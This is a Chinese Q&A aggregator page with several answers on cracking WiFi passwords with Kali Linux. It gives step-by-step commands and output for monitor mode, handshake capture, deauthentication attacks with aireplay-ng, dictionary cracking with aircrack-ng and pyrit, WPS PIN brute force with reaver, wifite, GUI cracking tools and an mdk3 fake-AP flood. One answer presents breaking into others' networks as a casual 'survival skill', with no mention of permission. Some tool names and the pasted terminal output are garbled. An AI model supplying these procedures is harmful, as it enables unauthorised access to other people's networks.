當前位置:首頁 » 網路管理 » kaliwifi破解wifi密碼
擴展閱讀
webinf下怎麼引入js 2023-08-31 21:54:13
堡壘機怎麼打開web 2023-08-31 21:54:11

kaliwifi破解wifi密碼

發布時間: 2022-12-19 09:23:21

A. 怎麼用kali linux破wifi

首先在台式機上一定要有一個無線網卡,可以是插在主板上的無線網卡,也可以是USB介面的外置無線網卡,但是最好是Kali Linux支持的型號,不然驅動程序的問題很麻煩,X寶上有的賣。
再說Kali,Kali Linux上破解WIFI的工具非常全面,因為Kali有無線滲透測試的功能,但是系統性的學習還是挺麻煩的,一條條的調用命令破解步驟也比較繁瑣,非專業滲透測試人員推薦用一個Kali上面用於無線滲透測試的傻瓜型自動化腳本,那就是wifite。
wifite命令是用於無線滲透測試的自動化測試腳本,它是個python腳本,用於自動化調用kali上面的各種無線測試工具,像是reaver、aircrack-ng等。它會先嘗試PIN碼破解wifi,當無法用PIN碼破解時,會嘗試抓取wifi驗證握手包,然後用Kali上的字典進行握手包的暴力破解。PIN碼破解的時間一般比較短,握手包的暴力破解會用GPU來加速,破解的速度取決於主機的性能配置(還有密碼的復雜程度)。
wifite的使用方法:直接在終端輸入命令wifite,它會調用aircrack-ng打開網卡的監聽模式並掃描附近的無線網路並一一顯示出來,等它顯示一會兒後按下鍵盤上的Ctrl+C組合鍵,它會中斷對無線網的掃描並讓你選擇破解的目標網路,這時輸入要破解的網路的序號(注意是序號,是個數字)並按下回車,它就會自動進行破解工作,破解過程可能很長,也可能會失敗,等到破解完成會有相應的提示。

B. kail linux 怎麼破解無線

首先需要有一台運行kali linux的機器,無論是虛擬機或物理機,一塊支持監聽模式的無線網卡
root@kali:~# iwconfig wlan1 IEEE 802.11bg ESSID:off/any Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm Retry short limit:7 RTS thr:off Fragment thr:off Encryption key:off Power Management:off eth0 no wireless extensions.lo no wireless extensions.

查看無線網卡設備名
root@kali:~# airmon-ng start wlan1Found 2 processes that could cause trouble.If airomp-ng, aireplay-ng or airtun-ng stops working aftera short period of time, you may want to kill (some of) them!-e PID Name2772 dhclient4415 wpa_supplicantInterface Chipset Driverwlan1 Realtek RTL8187L rtl8187 - [phy0] (monitor mode enabled on mon0)

進入監聽模式
airomp-ng mon0 會列出搜索到的所有無線網路
從中找到你要測試破解的,下來BSSID
root@kali:~/test# airomp-ng -w nenew -c 11 --bssid E4:D3:32:41:56:12 mon0 CH 11 ][ Elapsed: 1 min ][ 2014-09-12 23:31 ][ WPA handshake: E4:D3:32:41:56:12 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID E4:D3:32:41:56:12 -44 53 171 7 0 11 54e. WPA2 CCMP PSK TP-LINK_5612 BSSID STATION PWR Rate Lost Frames Probe E4:D3:32:41:56:12 00:00:00:00:00:00 0 0 - 1 0 18135 E4:D3:32:41:56:12 64:B4:73:40:60:5C -21 1e- 6e 0 7

當看到WPA handshake:說明抓到了握手包,就可以來破解了
如果一直抓不到,可以用如下命令來攻擊,強迫重新握手
aireplay-ng -0 10 -a E4:D3:32:41:56:12 -c 64:B4:73:40:60:5C mon0 --ignore-negative-one

抓到握手包後,就可以用字典來跑密碼了。
root@kali:~/test# aircrack-ng -w ./password.txt nenew-21.cap Opening nenew-21.capRead 18654 packets. # BSSID ESSID Encryption 1 D0:C7:C0:6E:53:53 TP-LINK_5353 WPA (1 handshake)Choosing first network as target.Opening nenew-21.capReading packets, please wait...

跑的速度如何取決於你機器的性能,更取決於你的字典
如果用物理機,有比較好的顯卡,還可以用顯卡來加速破解,效率比cpu高的多
kali linux下裝顯卡驅動,sdk等,參考如下鏈接
http://xiao106347.blog.163.com/blog/static/2159920782013113013549364
http://vistb.net/2011/08/how-to-crack-wifi-part-four/
http://blog.sina.com.cn/s/blog_56a70c040101exje.html
我這里用顯卡,很快就跑出了密碼
root@kali:~# pyrit -r nenew-21.cap -i password.txt -b D0:C7:C0:6E:53:53 attack_passthroughPyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.comThis code is distributed under the GNU General Public License v3+Parsing file 'nenew-21.cap' (1/1)...Parsed 14 packets (14 802.11-packets), got 1 AP(s)Tried 4420221 PMKs so far; 86496 PMKs per second.The password is 'qq123789'.

C. WIFI密碼破解姿勢總結(1)

    WiFi的時代,蹭WiFi成為了一項基本"生存技能"。外出出差時,你想搞點事情,毫無疑問,wifi作為目標是最好的選擇。

    SSID:服務集標識符,用來標識某一無線區域網的唯一標識

    WAP:無線應用協議,利用它可以把網路上的信息傳遞到無線通信終端

    AP:無限訪問點或接入點,客戶需連接AP才能獲得登陸

    WEP:802.11定義下的一種加密方式

    WPA:常見的無線網路認證之一

    Station:站點,網路最基本的組成部門,通常指無線客戶端

    BSSID:基本服務單元ID,通常顯示為接入點的MAC地址

    信道:對頻段進一步的劃分,通信的通道,是信號傳輸的媒介

    信道寬度:例如有20MHZ,40MHZ等,表示一個信道的寬度

    抓包:將網路傳輸發送與接受的數據包進行捕獲,重發,編輯等操作

    CDLinux

    KaliLinux

    無線網卡

路由器加密有WEP,WPA/WPA2等加密方式,目前WEP加密方式基本已經沒有了,常見都是WPA/WPA2這種加密方式,而我們進行破解,也就是利用字典去撞密碼。

打開minidwep-gtk,如果提示如下,需要先設置網卡

插入無線網卡後,連接一下即可

打開後點擊掃描

可以看到尾號有wps的,我們可以利用PIN碼進行破解

了解:Pin碼為8位數的數字組合,一共為11000個,分為前半段4位10000個,後半段3位1000個(最後一位沒用),所有隻用3位來排列,就只有1000個,一共就是10000+1000=110000。而根據第一位為順序也並不需要全部走完11000個,當跑pin碼時,前面四位成功定位後,進度會自動跳到百分九十,PIN碼破解能百分百破解出,所以此方法最省時省力

而後面有MAC地址的這種是指有客戶端連接,可以抓取手握包利用字典跑密碼

選擇wps的利用PIN碼破解,點擊Reaver

看到數值有變化,就表示可以破解

建議選取穩定的wifi,不然有時候嘗試到正確值時,可能因為網路原因,導致失敗。

90%此時表示前四位全部正確,下圖則得到wifi密碼,以及pin碼

而如果選擇wpa/wpa2,我們直接點擊啟動

這個時候它就會自己抓取握手包,當抓到握手包會提示

握手包需要對方有大的流量操作,如看電影,如果流量過小,可能抓取不到

最後點擊跑字典,選擇握手包,再選擇字典就開始了

一般幾分鍾就能跑到密碼了。

還是和剛才一樣,先插入無線網卡

利用FeedingBottle奶瓶來進行破解,打開後選擇YES

選擇網卡後,點擊Next

點擊Scan進行掃描周圍wifi

這個畫面有點似曾相識,沒錯,它就時集成了airomp-ng

掃描完成後,我們盡量去選擇有用戶連接在的wifi,看箭頭指示地方

如果目標wifi沒有用戶連接,我們可以先選擇,它會自動等待上線,抓取握手包

繼續接著點擊Next

點擊Start開始,會提示讓你選擇字典

選擇好字典後,則會自動開始,自動抓取握手包,當抓取到後會自動跑字典

下圖則得到密碼為zeppelin

下一章講其他兩個WIFI破解姿勢。

D. 過時的wifi破解工具

之前我們講過了fluxion和aircrack破解wifi的方法

其實還有很多的wifi破解方式,不妨都試試。知曉每一個工具的優缺點,在合適的情境下去選擇最適合的方法

不幸的是下面講的這些破解方法基本已經成了古董了,只可遠觀而不可褻玩焉。

因為已經不怎麼管用了...

如果想了解wifi歷史的人可以繼續接著看下去,其他的嘛就快點去看其他文章吧

弄這么多不能用的wifi有什麼用呢?之後我們在知道釣魚wifi的時候會用到,這里我們先講一下

mdk3 wlan1 b -f FakeAPName.txt -c 2

只需要這么一句話

下面開始我的失敗嘗試了,願意看的請留下聽我講述歷史...

其實看看也好,可以避免你們繼續這樣失敗的嘗試,少浪費一些時間

現在路由器防pin真的是防的很好,我pin了至少30次,只pin出來過機房的很老的一台路由器,其他的總是被pin死,看來這11000次也並不想想像中那樣脆弱。這是我做完這次實驗的感受

reaver是通過路由器上一個叫做wps的功能來實現攻擊的,WPS是許多路由器上都有的一個功能,可以為用戶提供簡單的配置過程,它與設備中硬編碼保存的一個PIN碼綁定在一起。Reaver利用的就是PIN碼的一個缺陷,最終的結果就是,只要有足夠的時間,它就能破解WPA或WPA2的密碼。

根據pin碼破解的原理,可以看到只需要枚舉11000種情況就會必然破解出pin碼,從而通過pin得到wifi密碼。 具體的為什麼是11000種情況呢?

現在開始實現

1.將網卡調到監聽模式

打開終端輸入 airmon-ng start wlan0

2.掃描開啟wps的路由器。

輸入 wash -i wlan0mon

WPS Locked為No的就是開啟wps服務的路由器,都可以嘗試攻擊

3.找到了開啟WPS的wifi,接下來咱們就可以進行pin碼爆破,下面主要說一下reaver的參數。

reaver 命令:

reaver -i mon0 -b mac -S -v

示例:

reaver -i mon0 -b MAC -a -S –d9 –t9 -vv)

應因狀況調整參數(-c後面都已目標頻道為1作為例子)

選擇之前掃描出來的開啟WPS的wifi,選擇一個進行破解。

輸入: reaver -i wlan1 -b 54:E6:FC:35:C5:82 -S -N -vv -c 4

在窮舉的過程中,reaver會生成以路由mac地址為名的wpc文件,這個文件在kali系統中/etc/reaver/文件夾下。

一時半會pin不出來,過段時間pin的時候命令加參數 -s file.wpc,就會根據之前的進度繼續pin。

最後pin完最後會顯示WPS PIN(正確的pin碼)和WPA PSK(wifi密碼),同時如果WPS功能沒關,pin碼沒修改,無論怎樣修改密碼,都可以通過pin碼獲取wifi密碼: reaver -i wlan0mon -b mac -p pin 碼,來再次得到密碼

一般pin的過快,會把路由器pin死,所以 一般還會加上-d5 -t5參數 ,添加5秒延時,當然數值可以自己改。我添加了也照樣被pin的死死的。不行了這個軟體

很看好他,來試一下

1.打開終端輸入wifite

2.我選擇了all

3.結果一個也沒整出來,他也是用的wps的來破解,現在用wps針對除了很老的路由器,其他的都不是很好辦了

圖形化界面,大家一看就會懂, 先選擇網卡,掃描,破解

說一下主界面的右下角有一個 toolbox工具箱

試試

破解不好用,而且一打開他整個虛擬機都變得有些卡,破解的進度條根本不走

不推薦

我們來試一下他的這些附件

也都不管用,不知道是不是因為使用了https的緣故,反正他現在肯定是out了

參考的一些網站

七夜

freebuf 

E. kali linux 怎麼破解無線網路密碼

首先,虛擬機內是無法使用內置無線網卡的,如果在虛擬機上用kali破解wifi,是需要usb無線網卡的。
在kali裡面破解無線網:在終端輸入命令wifite,它會打開網卡的監聽模式並掃描附近的無線網顯示出來,顯示一會兒後按下鍵盤上的ctrl+c組合鍵,它會讓你選擇破解的目標網路,這時輸入序號(數字),它就會自動進行破解工作,破解完成有提示。
原理:wifite命令是無線滲透測試的自動化腳本,它實際上是個python腳本,用於自動化調用kali上面的各種工具,像是reaver、aircrack-ng等。它先嘗試pin碼破解,無法用pin碼破解時,會嘗試抓取握手包,用字典進行握手包的暴力破解。pin碼破解的時間比較短,握手包的暴力破解可能會用gpu加速,取決於主機的性能和密碼的復雜程度,虛擬機對握手包暴力破解很無力(性能局限),就指望pin碼破解了。